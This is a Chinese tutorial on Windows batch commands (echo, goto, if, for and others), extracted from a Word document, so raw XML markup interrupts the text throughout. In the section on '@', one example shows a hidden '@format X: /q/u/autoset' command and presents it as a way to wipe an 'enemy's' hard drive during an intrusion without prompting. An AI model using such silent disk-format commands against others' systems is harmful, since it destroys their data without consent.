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Windows .bat 脚本简单用法介绍：</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一.简单批处理内部命令简介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1.Echo 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打开回显或关闭请求回显功能，或显示消息。如果没有任何参数，echo 命令将显示当前回显设置。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语法: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echo [{on│off}] [message]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Sample：@echo off / echo </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>hello world</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserv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在实际应用中我们会把这条命令和</w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>重定向</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>符号（也称为管</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>道符</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">号，一般用&gt; &gt;&gt; ^）结合来实现输入一些命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令到特定格式的文件中.这将在以后的例子中体现出来。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2.@ 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表示不显示@后面的命令，在入侵过程中（例如使用批处理来格式化敌人的硬盘）自然不能让对方看到你使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用的命令啦。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Sample：@echo off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@echo Now initializing the program,please wait a minite...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@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的，可喜的是微软留了个autoset这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个参数给我们，效果和/y是一样的。)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3.Goto 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lastRenderedPageBreak/>
        <w:t xml:space="preserve">指定跳转到标签，找到标签后，程序将处理从下一行开始的命令。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语法：goto label （label是参数，指定所要转向的批处理程序中的行。）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Sample：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if {%1}=={} goto noparms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if {%2}=={} goto noparms（如果这里的if、%1、%2你不明白的话，先跳过去，后面会有详细的解释。）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@Rem check parameters if null show usage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:noparms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echo Usage: monitor.bat ServerIP PortNumber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goto end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标签的名字可以随便起，但是最好是有意义的字母啦，字母前加个：用来表示这个字母是标签，goto命令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就是根据这个：来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。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4.Rem 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注释命令，在C语言中相当与/*--------*/,它并不会被执行，只是起一个注释的作用，便于别人阅读和你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自己日后修改。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Rem Message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Sample：@Rem Here is the description.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5.Pause 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运行 Pause 命令时，将显示下面的消息：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Press any key to continue . . .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Sample：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@echo off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lastRenderedPageBreak/>
        <w:t xml:space="preserve">:begin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copy a:*.* d：\back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echo Please put a new disk into driver A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pause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goto begin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在这个例子中，驱动器 A 中磁盘上的所有文件均复制到d:\back中。显示的注释提示您将另一张磁盘放入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驱动器 A 时，pause 命令会使程序挂起，以便您更换磁盘，然后按任意键继续处理。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6.Call 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从一个批处理程序调用另一个批处理程序，并且不终止父批处理程序。call 命令接受用作调用目标的标签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。如果在脚本或</w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>批处理文件</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">外使用 Call，它将不会在命令行起作用。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语法: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call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]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参数: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[Drive:}[Path] FileName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指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。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7.start 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调用外部程序，所有的</w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>DOS命令</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">和命令行程序都可以由start命令来调用。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常用参数：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MIN 开始时窗口最小化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SEPARATE 在分开的空间内开始 16 位 Windows 程序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HIGH 在 HIGH </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>优先级</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">类别开始应用程序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REALTIME 在 REALTIME </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>优先级</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">类别开始应用程序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WAIT 启动应用程序并等候它结束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lastRenderedPageBreak/>
        <w:t xml:space="preserve">parameters 这些为传送到命令/程序的参数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执行的应用程序是 32-位 GUI 应用程序时，CMD.EXE不等应用程序终止就返回命令提示。如果在命令脚本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内执行，该新行为则不会发生。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8.choice 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choice 使用此命令可以让用户输入一个字符，从而运行不同的命令。使用时应该加/c:参数，c:后应写提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示可输入的字符，之间无空格。它的返回码为1234......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如: choice /c:dme defrag,mem,end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将显示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defrag,mem,end[D,M,E]?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Sample：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Sample.bat的内容如下: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@echo off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choice /c:dme defrag,mem,end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if errorlevel 3 goto defrag （应先判断数值最高的错误码）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if errorlevel 2 goto mem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if errotlevel 1 goto end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:defrag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c:\dos\defrag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goto end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:mem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mem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goto end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:end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lastRenderedPageBreak/>
        <w:t xml:space="preserve">echo good bye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此文件运行后，将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ，然后</w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>if语句</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">将作出判断，d表示执行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标号为defrag的程序段，m表示执行标号为mem的程序段，e表示执行标号为end的程序段，每个程序段最后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都以goto end将程序跳到end标号处，然后程序将显示good bye，文件结束。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9.If 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if 表示将判断是否符合规定的条件，从而决定执行不同的命令。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有三种格式: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1)、if "参数" == "字符串" 待执行的命令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参数如果等于指定的字符串，则条件成立，</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>运行命令</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，否则运行下一句。(注意是两个等号）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如if "%1"=="a" format a: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if {%1}=={} goto noparms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if {%2}=={} goto noparms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2)、if exist 文件名 待执行的命令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如果有指定的文件，则条件成立，</w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>运行命令</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，否则运行下一句。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如if exist </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>config.sys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> edit </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>config.sys</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserv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3)、if errorlevel / if not errorlevel 数字 待执行的命令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如果返回码等于指定的数字，则条件成立，</w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>运行命令</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，否则运行下一句。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如if errorlevel 2 goto x2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DOS程序运行时都会返回一个数字给DOS，称为错误码errorlevel或称返回码，常见的返回码为0、1。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10.for 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for 命令是一个比较复杂的命令，主要用于参数在指定的范围</w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>内循环</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">执行命令。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在</w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>批处理文件</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">中使用 FOR 命令时，指定变量请使用 %%variable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for {%variable│%%variable} in (set) do command [ CommandLineOptions]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%variable 指定一个单一字母可替换的参数。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(set) 指定一个或一组文件。可以使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>通配符</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserv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command 指定对每个文件执行的命令。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command-parameters 为特定命令指定参数或命令行开关。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在</w:t>
      </w:r>
      <w:hyperlink r:id="rId22" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>批处理文件</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">中使用 FOR 命令时，指定变量请使用 %%variable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而不要用 %variable。变量名称是区分大小写的，所以 %i 不同于 %I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如果命令扩展名被启用，下列额外的 FOR 命令格式会受到支持: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FOR /D %variable IN (set) DO command [command-parameters]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如果集中包含</w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>通配符</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，则指定与目录名匹配，而不与文件名匹配。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FOR /R [[drive:]path] %variable IN (set) DO command [command-parameters]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检查以 [drive:]path 为根的目录树，指向每个目录中的FOR 语句。如果在 /R 后没有指定目录，则使用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当前目录。如果集仅为一个单点(.)字符，则枚举该目录树。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FOR /L %variable IN (start,step,end) DO command [command-parameters]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该集表示以</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>增量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">形式从开始到结束的一个数字序列。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因此，(1,1,5) 将产生序列 1 2 3 4 5，(5,-1,1) 将产生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序列 (5 4 3 2 1)。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FOR /F ["options"] %variable IN (file-set) DO command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FOR /F ["options"] %variable IN ("string") DO command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lastRenderedPageBreak/>
        <w:t xml:space="preserve">FOR /F ["options"] %variable IN ('command') DO command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或者，如果有 usebackq 选项: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FOR /F ["options"] %variable IN (file-set) DO command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FOR /F ["options"] %variable IN ("string") DO command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FOR /F ["options"] %variable IN ('command') DO command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filenameset 为一个或多个文件名。继续到 filenameset 中的下一个文件之前，每份文件都已被打开、读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取并经过处理。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处理包括读取文件，将其分成一行行的文字，然后将每行解析成零或更多的符号。然后用已找到的符号字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符串变量值调用 For 循环。以默认方式，/F 通过每个文件的每一行中分开的第一个空白符号。跳过空白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行。您可通过指定可选 "options" 参数替代默认解析操作。这个带引号的字符串包括一个或多个指定不同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解析选项的关键字。这些关键字为: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eol=c - 指一个行注释字符的结尾(就一个)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skip=n - 指在文件开始时忽略的行数。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delims=xxx - 指</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>分隔符</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>集。这个替换了空格和跳格键的默认</w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>分隔符</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">集。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tokens=x,y,m-n - 指每行的哪一个符号被传递到每个迭代的 for 本身。这会导致额外变量名称的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格式为一个范围。通过 nth 符号指定 m 符号字符串中的最后一个字符星号，那么额外的变量将在最后一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个符号解析之分配并接受行的保留文本。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usebackq - 指定新语法已在下类情况中使用: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在作为命令执行一个后引号的字符串并且引号字符为文字字符串命令并允许在 file-set中使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>双引号</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">扩起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文件名称。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sample1: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FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command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会分析 myfile.txt 中的每一行，忽略以</w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>分号</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">打头的那些行，将每行中的第二个和第三个符号传递给 for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程序体；用逗号和/或 空格定界符号。请注意，这个 for 程序体的语句引用 %i 来取得第二个符号，引用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%j 来取得第三个符号，引用 %k来取得第三个符号后的所有剩余符号。对于带有空格的文件名，您需要用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hyperlink r:id="rId29" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>双引号</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将文件名括起来。为了用这种方式来使用</w:t>
      </w:r>
      <w:hyperlink r:id="rId30" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>双引号</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，您还需要使用 usebackq 选项，否则，双引号会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被理解成是用作定义某个要分析的字符串的。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%i 专门在 for 语句中得到说明，%j 和 %k 是通过tokens= 选项专门得到说明的。您可以通过 tokens=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一行指定最多 26 个符号，只要不试图说明一个高于字母 'z' 或'Z' 的变量。请记住，FOR 变量是单一字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母、分大小写和全局的；同时不能有 52 个以上都在使用中。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您还可以在相邻字符串上使用 FOR /F 分析逻辑；方法是，用</w:t>
      </w:r>
      <w:hyperlink r:id="rId31" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>单引号</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">将括号之间的 filenameset 括起来。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这样，该字符串会被当作一个文件中的一个单一输入行。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最后，您可以用 FOR /F 命令来分析命令的输出。方法是，将括号之间的 filenameset 变成一个反括字符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串。该字符串会被当作命令行，传递到一个子 CMD.EXE，其输出会被抓进内存，并被当作文件分析。因此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，以下例子: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FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i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会枚举当前环境中的</w:t>
      </w:r>
      <w:hyperlink r:id="rId32" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>环境变量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">名称。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另外，FOR 变量参照的替换已被增强。您现在可以使用下列选项语法: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~I - 删除任何引号(")，扩充 %I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%~fI - 将 %I 扩充到一个完全合格的路径名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%~dI - 仅将 %I 扩充到一个驱动器号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%~pI - 仅将 %I 扩充到一个路径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%~nI - 仅将 %I 扩充到一个文件名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%~xI - 仅将 %I 扩充到一个</w:t>
      </w:r>
      <w:hyperlink r:id="rId33" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>文件扩展名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserv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%~sI - 扩充的路径只含有短名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%~aI - 将 %I 扩充到文件的</w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>文件属性</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserv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%~tI - 将 %I 扩充到文件的日期/时间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%~zI - 将 %I 扩充到文件的大小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%~$PATH:I - 查找列在路径</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00953959">
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:color w:val="336699"/>
            <w:sz w:val="21"/>
          </w:rPr>
          <w:t>环境变量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00953959">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
